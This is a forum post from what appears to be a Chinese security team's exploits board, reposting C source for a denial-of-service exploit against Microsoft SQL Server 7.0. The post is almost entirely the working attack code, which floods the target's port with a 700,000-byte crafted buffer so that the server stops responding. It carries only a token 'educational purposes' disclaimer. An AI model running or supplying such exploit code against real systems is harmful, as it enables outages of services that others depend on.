Mssql Server7.0 Dos Exploit

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6825
精华: 834
积分: 36073
阅读权限: 255
性别: 男
来自: 中国
在线时间: 591 小时
注册时间: 2004-6-25
最后登录: 2008-10-12

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-10-3 04:49 只看该作者

Mssql Server7.0 Dos Exploit

信息来源：BST

复制内容到剪贴板

代码:

/* This code is for educational purposes, I am not responsible for your acts 

* Greets:sm0g DEADm|x #crack.fr itmaroc and evryone who I forgot */ 



#include <stdio.h> 

#include <winsock.h> 



#pragma comment(lib,"ws2_32") 

u_long resolv(char*); 





void main(int argc, char **argv) { 

WSADATA WinsockData; 

SOCKET s; 

int i; 

struct sockaddr_in vulh; 

char buffer[700000]; 

for(i=0;i<700000;i+=16)memcpy(buffer+i,"\x10\x00\x00\x10\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc 



\xcc\xcc\xcc",16); 





if (argc!=3) { 

printf(" MSSQL denial of service\n"); 

printf(" by securma massine\n"); 

printf("Cet outil a ete cree pour test ,je ne suis en aucun cas 

responsable des degats que vous pouvez en faire\n"); 

printf("Syntaxe: MSSQLdos <ip> <port>\n"); 

exit(1); 

} 



WSAStartup(0x101,&WinsockData); 

s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); 



ZeroMemory(&vulh,sizeof(vulh)); 

vulh.sin_family=AF_INET; 

vulh.sin_addr.s_addr=resolv(argv[1]); 

vulh.sin_port=htons(atoi(argv[2])); 

if (connect(s,(struct sockaddr*)&vulh,sizeof(vulh))==SOCKET_ERROR) { 

printf("Impossible de se connecter...le port est en generale 1433...\n"); 

exit(1); 

} 



{ 

send(s,buffer,sizeof(buffer),0); 



printf("Data envoyes...\n"); 

} 

printf("\nattendez quelques secondes et verifiez que le serveur ne 

repond plus.\n"); 

closesocket(s); 

WSACleanup(); 

} 





u_long resolv(char *host_name) { 

struct in_addr addr; 

struct hostent *host_ent; 



if ((addr.s_addr = inet_addr(host_name)) == -1) { 

if (!(host_ent = gethostbyname(host_name))) { 

printf ("Erreur DNS : Impossible de résoudre l&#39;adresse %s 

!!!\n",host_name); 

exit(1); 

} 

CopyMemory((char *)&addr.s_addr,host_ent->h_addr,host_ent->h_length); 

} 

return addr.s_addr; 

}

qq310926是我唯一用号，除此之外有其他号码号自称邪八冰血封情，则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Mssql Server7.0 Dos Exploit